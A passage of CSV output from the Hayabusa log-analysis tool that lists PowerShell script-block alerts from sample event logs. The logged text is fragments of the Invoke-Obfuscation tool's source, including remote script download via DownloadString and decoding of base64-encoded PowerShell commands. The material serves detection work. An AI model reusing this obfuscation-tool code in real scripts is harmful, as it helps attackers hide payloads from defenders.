$StillLookingForSubstitution = $FALSE } } # If no substitution occurred above then simply upper-case the first character and lower-case all the remaining characters. 
If($StillLookingForSubstitution) { $BreadCrumbArray += $Crumb.SubString(0,1).ToUppe",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"r() + $Crumb.SubString(1).ToLower() # If no substitution was found for the 3rd or later BreadCrumb element (only for Launcher BreadCrumb) then throw a warning so we can add this substitution pair to $BreadCrumbOCD. If(($BreadCrumb.Split('_').Count -eq 2) -AND ($BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb -ne 'Launcher')) { Write-Warning ""No substituion pair was found for `$Crumb=$Crumb in `$BreadCrumb=$BreadCrumb. Add this `$Crumb substitution pair to `$BreadCrumbOCD array in Invoke-Obfuscation."" } } } $BreadCrumb = $BreadCrumbArray -Join '\' } $BreadCrumb = '\' + $BreadCrumb } # Output menu heading. $FirstLine = ""Choose one of the below "" If($BreadCrumb -ne '') { $FirstLine = $FirstLine + $BreadCrumb.Trim('\') + ' ' } Write-Host ""$FirstLine"" -NoNewLine # Change color and verbiage if selection will execute command. If($SelectionContainsCommand) { Write-Host ""options"" -NoNewLine -ForegroundColor Green Write-Host "" to"" -NoNewLine Write-Host "" APPLY"" -NoNewLine -ForegroundColor Green Write-Host "" to current payload"" -NoNewLine } Else { Write-Host ""options"" -NoNewLine -ForegroundColor Yellow } Write-Host "":`n"" ForEach($Line in $Menu) { $LineSpace = $Line[0] $LineOption = $Line[1] $LineValue = $Line[2] Write-Host $LineSpace -NoNewLine # If not empty then include breadcrumb in $LineOption output (is not colored and won't affect user input syntax). 
If(($BreadCrumb -ne '') -AND ($LineSpace.StartsWith('['))) { Write-Host ($BreadCrumb.ToUpper().Trim('\') + '\') -NoNewLine } # Change color if selection will execute command. If($SelectionContainsCommand) { Write-Host $LineOption -NoNewLine -ForegroundColor Green } Else { Write-Host $LineOption -NoNewLine -ForegroundColor Yellow } # Add additional coloring to string encapsulated by <> if it exists in $LineValue. If($LineValue.Contains('<') -AND $LineValue.Contains('>')) { $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""`t$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan # Handle if more than one term needs to be output in different color. If($LastPart.Contains('<') -AND $LastPart.Contains('>')) { $LineValue = $LastPart $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan } Write-Host $LastPart } Else { Write-Host ""`t$LineValue"" } } # Prompt for user input with custom breadcrumb prompt. Write-Host '' If($UserInput -ne '') {Write-Host ''} $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -eq 0)) { # Output custom prompt. Write-Host ""Invoke-Obfuscation$BreadCrumb> "" -NoNewLine -ForegroundColor Magenta # Get interactive user input if CliCommands input variable was not specified by user. 
If(($Script:CliCommands.Count -gt 0) -OR ($Script:CliCommands -ne $NULL)) { If($Script:CliCommands.GetType().Name -eq 'String') { $NextCliCommand = $Script:CliCommands.Trim() $Script:CliCommands = @() } Else { $NextCliCommand = ([String]$Script:CliCommands[0]).Trim() $Script:CliCommands = For($i=1; $i -lt $Script:CliCommands.Count; $i++) {$Script:CliCommands[$i]} } $UserInput = $NextCliCommand } Else { # If Command was defined on command line and NoExit switch was not defined then output final ObfuscatedCommand to stdout and then quit. Otherwise continue with interactive Invoke-Obfuscation. If($CliWasSpecified -AND ($Script:CliCommands.Count -lt 1) -AND ($Script:CompoundCommand.Count -lt 1) -AND ($Script:QuietWasSpecified -OR !$NoExitWasSpecified)) { If($Script:QuietWasSpecified) { # Remove Write-Host and Start-Sleep proxy functions so that Write-Host and Start-Sleep cmdlets will be called during the remainder of the interactive Invoke-Obfuscation session. Remove-Item -Path Function:Write-Host Remove-Item -Path Function:Start-Sleep $Script:QuietWasSpecified = $FALSE # Automatically run 'Show Options' so the user has context of what has successfully been executed. $UserInput = 'show options' $BreadCrumb = 'Show Options' } # -NoExit wasn't specified and -Command was, so we will output the result back in the main While loop. If(!$NoExitWasSpecified) { $UserInput = 'quit' } } Else { $UserInput = (Read-Host).Trim() } # Process interactive UserInput using CLI syntax, so comma-delimited and slash-delimited commands can be processed interactively. If(($Script:CliCommands.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND $UserInput.Contains(',')) { $Script:CliCommands = $UserInput.Split(',') # Reset $UserInput so current While loop will be traversed once more and process UserInput command as a CliCommand. $UserInput = '' } } } # Trim any leading trailing slashes so it doesn't misinterpret it as a compound command unnecessarily. 
$UserInput = $UserInput.Trim('/\') # Cause UserInput of base menu level directories to automatically work. # The only exception is STRING if the current MenuName is _token since it can be the base menu STRING or TOKEN/STRING. If((($MenuLevel | ForEach-Object {$_[1].Trim()}) -Contains $UserInput.Split('/\')[0]) -AND !(('string' -Contains $UserInput.Split('/\')[0]) -AND ($MenuName -eq '_token')) -AND ($MenuName -ne '')) { $UserInput = 'home/' + $UserInput.Trim() } # If current command contains \ or / and does not start with SET or OUT then we are dealing with a compound command. # Setting $Script:CompounCommand in below IF block. If(($Script:CompoundCommand.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND !$UserInput.ToLower().StartsWith('out ') -AND ($UserInput.Contains('\') -OR $UserInput.Contains('/'))) { $Script:CompoundCommand = $UserInput.Split('/\') } # If current command contains \ or / and does not start with SET then we are dealing with a compound command. # Parsing out next command from $Script:CompounCommand in below IF block. If($Script:CompoundCommand.Count -gt 0) { $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -gt 0)) { # If last compound command then it will be a string. If($Script:CompoundCommand.GetType().Name -eq 'String') { $NextCompoundCommand = $Script:CompoundCommand.Trim() $Script:CompoundCommand = @() } Else { # If there are more commands left in compound command then it won't be a string (above IF block). # In this else block we get the next command from CompoundCommand array. $NextCompoundCommand = ([String]$Script:CompoundCommand[0]).Trim() # Set remaining commands back into CompoundCommand. $Temp = $Script:CompoundCommand $Script:CompoundCommand = @() For($i=1; $i -lt $Temp.Count; $i++) { $Script:CompoundCommand += $Temp[$i] } } $UserInput = $NextCompoundCommand } } # Handle new RegEx functionality. 
# Identify if there is any regex in current UserInput by removing all alphanumeric characters (and + or # which are found in launcher names). $TempUserInput = $UserInput.ToLower() @(97..122) | ForEach-Object {$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')} @(0..9) | ForEach-Object {$TempUserInput = $TempUserInput.Replace($_,'')} $TempUserInput = $TempUserInput.Replace(' ','').Replace('+','').Replace('#','').Replace('\','').Replace('/','').Replace('-','').Replace('?','') If(($TempUserInput.Length -gt 0) -AND !($UserInput.Trim().ToLower().StartsWith('set ')) -AND !($UserInput.Trim().ToLower().StartsWith('out '))) { # Replace any simple wildcard with .* syntax. $UserInput = $UserInput.Replace('.*','_____').Replace('*','.*').Replace('_____','.*') # Prepend UserInput with ^ and append with $ if not already there. If(!$UserInput.Trim().StartsWith('^') -AND !$UserInput.Trim().StartsWith('.*')) { $UserInput = '^' + $UserInput } If(!$UserInput.Trim().EndsWith('$') -AND !$UserInput.Trim().EndsWith('.*')) { $UserInput = $UserInput + '$' } # See if there are any filtered matches in the current menu. Try { $MenuFiltered = ($Menu | Where-Object {($_[1].Trim() -Match $UserInput) -AND ($_[1].Trim().Length -gt 0)} | ForEach-Object {$_[1].Trim()}) } Catch { # Output error message if Regular Expression causes error in ab",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"r() + $Crumb.SubString(1).ToLower() # If no substitution was found for the 3rd or later BreadCrumb element (only for Launcher BreadCrumb) then throw a warning so we can add this substitution pair to $BreadCrumbOCD. 
If(($BreadCrumb.Split('_').Count -eq 2) -AND ($BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb -ne 'Launcher')) { Write-Warning ""No substituion pair was found for `$Crumb=$Crumb in `$BreadCrumb=$BreadCrumb. Add this `$Crumb substitution pair to `$BreadCrumbOCD array in Invoke-Obfuscation."" } } } $BreadCrumb = $BreadCrumbArray -Join '\' } $BreadCrumb = '\' + $BreadCrumb } # Output menu heading. $FirstLine = ""Choose one of the below "" If($BreadCrumb -ne '') { $FirstLine = $FirstLine + $BreadCrumb.Trim('\') + ' ' } Write-Host ""$FirstLine"" -NoNewLine # Change color and verbiage if selection will execute command. If($SelectionContainsCommand) { Write-Host ""options"" -NoNewLine -ForegroundColor Green Write-Host "" to"" -NoNewLine Write-Host "" APPLY"" -NoNewLine -ForegroundColor Green Write-Host "" to current payload"" -NoNewLine } Else { Write-Host ""options"" -NoNewLine -ForegroundColor Yellow } Write-Host "":`n"" ForEach($Line in $Menu) { $LineSpace = $Line[0] $LineOption = $Line[1] $LineValue = $Line[2] Write-Host $LineSpace -NoNewLine # If not empty then include breadcrumb in $LineOption output (is not colored and won't affect user input syntax). If(($BreadCrumb -ne '') -AND ($LineSpace.StartsWith('['))) { Write-Host ($BreadCrumb.ToUpper().Trim('\') + '\') -NoNewLine } # Change color if selection will execute command. If($SelectionContainsCommand) { Write-Host $LineOption -NoNewLine -ForegroundColor Green } Else { Write-Host $LineOption -NoNewLine -ForegroundColor Yellow } # Add additional coloring to string encapsulated by <> if it exists in $LineValue. 
If($LineValue.Contains('<') -AND $LineValue.Contains('>')) { $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""`t$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan # Handle if more than one term needs to be output in different color. If($LastPart.Contains('<') -AND $LastPart.Contains('>')) { $LineValue = $LastPart $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan } Write-Host $LastPart } Else { Write-Host ""`t$LineValue"" } } # Prompt for user input with custom breadcrumb prompt. Write-Host '' If($UserInput -ne '') {Write-Host ''} $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -eq 0)) { # Output custom prompt. Write-Host ""Invoke-Obfuscation$BreadCrumb> "" -NoNewLine -ForegroundColor Magenta # Get interactive user input if CliCommands input variable was not specified by user. If(($Script:CliCommands.Count -gt 0) -OR ($Script:CliCommands -ne $NULL)) { If($Script:CliCommands.GetType().Name -eq 'String') { $NextCliCommand = $Script:CliCommands.Trim() $Script:CliCommands = @() } Else { $NextCliCommand = ([String]$Script:CliCommands[0]).Trim() $Script:CliCommands = For($i=1; $i -lt $Script:CliCommands.Count; $i++) {$Script:CliCommands[$i]} } $UserInput = $NextCliCommand } Else { # If Command was defined on command line and NoExit switch was not defined then output final ObfuscatedCommand to stdout and then quit. Otherwise continue with interactive Invoke-Obfuscation. 
If($CliWasSpecified -AND ($Script:CliCommands.Count -lt 1) -AND ($Script:CompoundCommand.Count -lt 1) -AND ($Script:QuietWasSpecified -OR !$NoExitWasSpecified)) { If($Script:QuietWasSpecified) { # Remove Write-Host and Start-Sleep proxy functions so that Write-Host and Start-Sleep cmdlets will be called during the remainder of the interactive Invoke-Obfuscation session. Remove-Item -Path Function:Write-Host Remove-Item -Path Function:Start-Sleep $Script:QuietWasSpecified = $FALSE # Automatically run 'Show Options' so the user has context of what has successfully been executed. $UserInput = 'show options' $BreadCrumb = 'Show Options' } # -NoExit wasn't specified and -Command was, so we will output the result back in the main While loop. If(!$NoExitWasSpecified) { $UserInput = 'quit' } } Else { $UserInput = (Read-Host).Trim() } # Process interactive UserInput using CLI syntax, so comma-delimited and slash-delimited commands can be processed interactively. If(($Script:CliCommands.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND $UserInput.Contains(',')) { $Script:CliCommands = $UserInput.Split(',') # Reset $UserInput so current While loop will be traversed once more and process UserInput command as a CliCommand. $UserInput = '' } } } # Trim any leading trailing slashes so it doesn't misinterpret it as a compound command unnecessarily. $UserInput = $UserInput.Trim('/\') # Cause UserInput of base menu level directories to automatically work. # The only exception is STRING if the current MenuName is _token since it can be the base menu STRING or TOKEN/STRING. If((($MenuLevel | ForEach-Object {$_[1].Trim()}) -Contains $UserInput.Split('/\')[0]) -AND !(('string' -Contains $UserInput.Split('/\')[0]) -AND ($MenuName -eq '_token')) -AND ($MenuName -ne '')) { $UserInput = 'home/' + $UserInput.Trim() } # If current command contains \ or / and does not start with SET or OUT then we are dealing with a compound command. 
# Setting $Script:CompounCommand in below IF block. If(($Script:CompoundCommand.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND !$UserInput.ToLower().StartsWith('out ') -AND ($UserInput.Contains('\') -OR $UserInput.Contains('/'))) { $Script:CompoundCommand = $UserInput.Split('/\') } # If current command contains \ or / and does not start with SET then we are dealing with a compound command. # Parsing out next command from $Script:CompounCommand in below IF block. If($Script:CompoundCommand.Count -gt 0) { $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -gt 0)) { # If last compound command then it will be a string. If($Script:CompoundCommand.GetType().Name -eq 'String') { $NextCompoundCommand = $Script:CompoundCommand.Trim() $Script:CompoundCommand = @() } Else { # If there are more commands left in compound command then it won't be a string (above IF block). # In this else block we get the next command from CompoundCommand array. $NextCompoundCommand = ([String]$Script:CompoundCommand[0]).Trim() # Set remaining commands back into CompoundCommand. $Temp = $Script:CompoundCommand $Script:CompoundCommand = @() For($i=1; $i -lt $Temp.Count; $i++) { $Script:CompoundCommand += $Temp[$i] } } $UserInput = $NextCompoundCommand } } # Handle new RegEx functionality. # Identify if there is any regex in current UserInput by removing all alphanumeric characters (and + or # which are found in launcher names). 
$TempUserInput = $UserInput.ToLower() @(97..122) | ForEach-Object {$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')} @(0..9) | ForEach-Object {$TempUserInput = $TempUserInput.Replace($_,'')} $TempUserInput = $TempUserInput.Replace(' ','').Replace('+','').Replace('#','').Replace('\','').Replace('/','').Replace('-','').Replace('?','') If(($TempUserInput.Length -gt 0) -AND !($UserInput.Trim().ToLower().StartsWith('set ')) -AND !($UserInput.Trim().ToLower().StartsWith('out '))) { # Replace any simple wildcard with .* syntax. $UserInput = $UserInput.Replace('.*','_____').Replace('*','.*').Replace('_____','.*') # Prepend UserInput with ^ and append with $ if not already there. If(!$UserInput.Trim().StartsWith('^') -AND !$UserInput.Trim().StartsWith('.*')) { $UserInput = '^' + $UserInput } If(!$UserInput.Trim().EndsWith('$') -AND !$UserInput.Trim().EndsWith('.*')) { $UserInput = $UserInput + '$' } # See if there are any filtered matches in the current menu. Try { $MenuFiltered = ($Menu | Where-Object {($_[1].Trim() -Match $UserInput) -AND ($_[1].Trim().Length -gt 0)} | ForEach-Object {$_[1].Trim()}) } Catch { # Output error message if Regular Expression causes error in ab",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,low,Evas,Use Remove-Item to Delete File,,rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ove filtering step. # E.g. 
Using *+ instead of *[+] Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' The current Regular Expression caused the following error:' write-host "" $_"" -ForegroundColor Red } # If there are filtered matches in the current menu then randomly choose one for the UserInput value. If($MenuFiltered -ne $NULL) { # Randomly select UserInput from filtered options. $UserInput = (Get-Random -Input $MenuFiltered).Trim() # Output randomly chosen option (and filtered options selected from) if more than one option were returned from regex. If($MenuFiltered.Count -gt 1) { # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host ""`n`nRandomly selected "" -NoNewline Write-Host $UserInput -NoNewline -ForegroundColor $ColorToOutput write-host "" from the following filtered options: "" -NoNewline For($i=0; $i -lt $MenuFiltered.Count-1; $i++) { Write-Host $MenuFiltered[$i].Trim() -NoNewLine -ForegroundColor $ColorToOutput Write-Host ', ' -NoNewLine } Write-Host $MenuFiltered[$MenuFiltered.Count-1].Trim() -NoNewLine -ForegroundColor $ColorToOutput } } } # If $UserInput is all numbers and is in a menu in $MenusWithMultiSelectNumbers $OverrideAcceptableInput = $FALSE $MenusWithMultiSelectNumbers = @('\Launcher') If(($UserInput.Trim(' 0123456789').Length -eq 0) -AND $BreadCrumb.Contains('\') -AND ($MenusWithMultiSelectNumbers -Contains $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')))) { $OverrideAcceptableInput = $TRUE } If($ExitInputOptions -Contains $UserInput.ToLower()) { Return $ExitInputOptions[0] } ElseIf($MenuInputOptions -Contains $UserInput.ToLower()) { # Commands like 'back' that will return user to previous interactive menu. 
If($BreadCrumb.Contains('\')) {$UserInput = $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')).Replace('\','_')} Else {$UserInput = ''} Return $UserInput.ToLower() } ElseIf($HomeMenuInputOptions[0] -Contains $UserInput.ToLower()) { Return $UserInput.ToLower() } ElseIf($UserInput.ToLower().StartsWith('set ')) { # Extract $UserInputOptionName and $UserInputOptionValue from $UserInput SET command. $UserInputOptionName = $NULL $UserInputOptionValue = $NULL $HasError = $FALSE $UserInputMinusSet = $UserInput.SubString(4).Trim() If($UserInputMinusSet.IndexOf(' ') -eq -1) { $HasError = $TRUE $UserInputOptionName = $UserInputMinusSet.Trim() } Else { $UserInputOptionName = $UserInputMinusSet.SubString(0,$UserInputMinusSet.IndexOf(' ')).Trim().ToLower() $UserInputOptionValue = $UserInputMinusSet.SubString($UserInputMinusSet.IndexOf(' ')).Trim() } # Validate that $UserInputOptionName is defined in $SettableInputOptions. If($SettableInputOptions -Contains $UserInputOptionName) { # Perform separate validation for $UserInputOptionValue before setting value. Set to 'emptyvalue' if no value was entered. If($UserInputOptionValue.Length -eq 0) {$UserInputOptionName = 'emptyvalue'} Switch($UserInputOptionName.ToLower()) { 'scriptpath' { If($UserInputOptionValue -AND ((Test-Path $UserInputOptionValue) -OR ($UserInputOptionValue -Match '(http|https)://'))) { # Reset ScriptBlock in case it contained a value. $Script:ScriptBlock = '' # Check if user-input ScriptPath is a URL or a directory. If($UserInputOptionValue -Match '(http|https)://') { # ScriptPath is a URL. # Download content. $Script:ScriptBlock = (New-Object Net.WebClient).DownloadString($UserInputOptionValue) # Set script-wide variables for future reference. 
$Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath (as URL):"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } ElseIf ((Get-Item $UserInputOptionValue) -is [System.IO.DirectoryInfo]) { # ScriptPath does not exist. Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path is a directory instead of a file (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } Else { # Read contents from user-input ScriptPath value. Get-ChildItem $UserInputOptionValue -ErrorAction Stop | Out-Null $Script:ScriptBlock = [IO.File]::ReadAllText((Resolve-Path $UserInputOptionValue)) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath:"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } } Else { # ScriptPath not found (failed Test-Path). Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path not found (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } } 'scriptblock' { # Remove evenly paired {} '' or """" if user includes it around their scriptblock input. 
ForEach($Char in @(@('{','}'),@('""','""'),@(""'"",""'""))) { While($UserInputOptionValue.StartsWith($Char[0]) -AND $UserInputOptionValue.EndsWith($Char[1])) { $UserInputOptionValue = $UserInputOptionValue.SubString(1,$UserInputOptionValue.Length-2).Trim() } } # Check if input is PowerShell encoded command syntax so we can decode for scriptblock. If($UserInputOptionValue -Match 'powershell(.exe | )\s*-(e |ec |en |enc |enco |encod |encode)\s*[""'']*[a-z=]') { # Extract encoded command. $EncodedCommand = $UserInputOptionValue.SubString($UserInputOptionValue.ToLower().IndexOf(' -e')+3) $EncodedCommand = $EncodedCommand.SubString($EncodedCommand.IndexOf(' ')).Trim("" '`"""") # Decode Unicode-encoded $EncodedCommand $UserInputOptionValue = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedCommand)) } # Set script-wide variables for future reference. $Script:ScriptPath = 'N/A' $Script:ScriptBlock = $UserInputOptionValue $Script:ObfuscatedCommand = $UserInputOptionValue $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $UserInputOptionValue $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptBlock:"" -ForegroundColor Cyan Write-Host $Script:ScriptBlock -ForegroundColor Magenta } 'emptyvalue' { # No OPTIONVALUE was entered after OPTIONNAME. $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' No value was entered after' -NoNewLine Write-Host ' SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundColor Cyan Write-Host '.' 
-NoNewLine } default {Write-Error ""An invalid OPTIONNAME ($UserInputOptionName) was passed to switch block.""; Exit} } } Else { $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' OPTIONNAME' -NoNewLine Write-Host "" $UserInputOptionName"" -NoN",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"ove filtering step. # E.g. Using *+ instead of *[+] Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' The current Regular Expression caused the following error:' write-host "" $_"" -ForegroundColor Red } # If there are filtered matches in the current menu then randomly choose one for the UserInput value. If($MenuFiltered -ne $NULL) { # Randomly select UserInput from filtered options. $UserInput = (Get-Random -Input $MenuFiltered).Trim() # Output randomly chosen option (and filtered options selected from) if more than one option were returned from regex. If($MenuFiltered.Count -gt 1) { # Change color and verbiage if acceptable options will execute an obfuscation function. 
If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host ""`n`nRandomly selected "" -NoNewline Write-Host $UserInput -NoNewline -ForegroundColor $ColorToOutput write-host "" from the following filtered options: "" -NoNewline For($i=0; $i -lt $MenuFiltered.Count-1; $i++) { Write-Host $MenuFiltered[$i].Trim() -NoNewLine -ForegroundColor $ColorToOutput Write-Host ', ' -NoNewLine } Write-Host $MenuFiltered[$MenuFiltered.Count-1].Trim() -NoNewLine -ForegroundColor $ColorToOutput } } } # If $UserInput is all numbers and is in a menu in $MenusWithMultiSelectNumbers $OverrideAcceptableInput = $FALSE $MenusWithMultiSelectNumbers = @('\Launcher') If(($UserInput.Trim(' 0123456789').Length -eq 0) -AND $BreadCrumb.Contains('\') -AND ($MenusWithMultiSelectNumbers -Contains $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')))) { $OverrideAcceptableInput = $TRUE } If($ExitInputOptions -Contains $UserInput.ToLower()) { Return $ExitInputOptions[0] } ElseIf($MenuInputOptions -Contains $UserInput.ToLower()) { # Commands like 'back' that will return user to previous interactive menu. If($BreadCrumb.Contains('\')) {$UserInput = $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')).Replace('\','_')} Else {$UserInput = ''} Return $UserInput.ToLower() } ElseIf($HomeMenuInputOptions[0] -Contains $UserInput.ToLower()) { Return $UserInput.ToLower() } ElseIf($UserInput.ToLower().StartsWith('set ')) { # Extract $UserInputOptionName and $UserInputOptionValue from $UserInput SET command. 
$UserInputOptionName = $NULL $UserInputOptionValue = $NULL $HasError = $FALSE $UserInputMinusSet = $UserInput.SubString(4).Trim() If($UserInputMinusSet.IndexOf(' ') -eq -1) { $HasError = $TRUE $UserInputOptionName = $UserInputMinusSet.Trim() } Else { $UserInputOptionName = $UserInputMinusSet.SubString(0,$UserInputMinusSet.IndexOf(' ')).Trim().ToLower() $UserInputOptionValue = $UserInputMinusSet.SubString($UserInputMinusSet.IndexOf(' ')).Trim() } # Validate that $UserInputOptionName is defined in $SettableInputOptions. If($SettableInputOptions -Contains $UserInputOptionName) { # Perform separate validation for $UserInputOptionValue before setting value. Set to 'emptyvalue' if no value was entered. If($UserInputOptionValue.Length -eq 0) {$UserInputOptionName = 'emptyvalue'} Switch($UserInputOptionName.ToLower()) { 'scriptpath' { If($UserInputOptionValue -AND ((Test-Path $UserInputOptionValue) -OR ($UserInputOptionValue -Match '(http|https)://'))) { # Reset ScriptBlock in case it contained a value. $Script:ScriptBlock = '' # Check if user-input ScriptPath is a URL or a directory. If($UserInputOptionValue -Match '(http|https)://') { # ScriptPath is a URL. # Download content. $Script:ScriptBlock = (New-Object Net.WebClient).DownloadString($UserInputOptionValue) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath (as URL):"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } ElseIf ((Get-Item $UserInputOptionValue) -is [System.IO.DirectoryInfo]) { # ScriptPath does not exist. 
Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path is a directory instead of a file (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } Else { # Read contents from user-input ScriptPath value. Get-ChildItem $UserInputOptionValue -ErrorAction Stop | Out-Null $Script:ScriptBlock = [IO.File]::ReadAllText((Resolve-Path $UserInputOptionValue)) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath:"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } } Else { # ScriptPath not found (failed Test-Path). Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path not found (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } } 'scriptblock' { # Remove evenly paired {} '' or """" if user includes it around their scriptblock input. ForEach($Char in @(@('{','}'),@('""','""'),@(""'"",""'""))) { While($UserInputOptionValue.StartsWith($Char[0]) -AND $UserInputOptionValue.EndsWith($Char[1])) { $UserInputOptionValue = $UserInputOptionValue.SubString(1,$UserInputOptionValue.Length-2).Trim() } } # Check if input is PowerShell encoded command syntax so we can decode for scriptblock. If($UserInputOptionValue -Match 'powershell(.exe | )\s*-(e |ec |en |enc |enco |encod |encode)\s*[""'']*[a-z=]') { # Extract encoded command. 
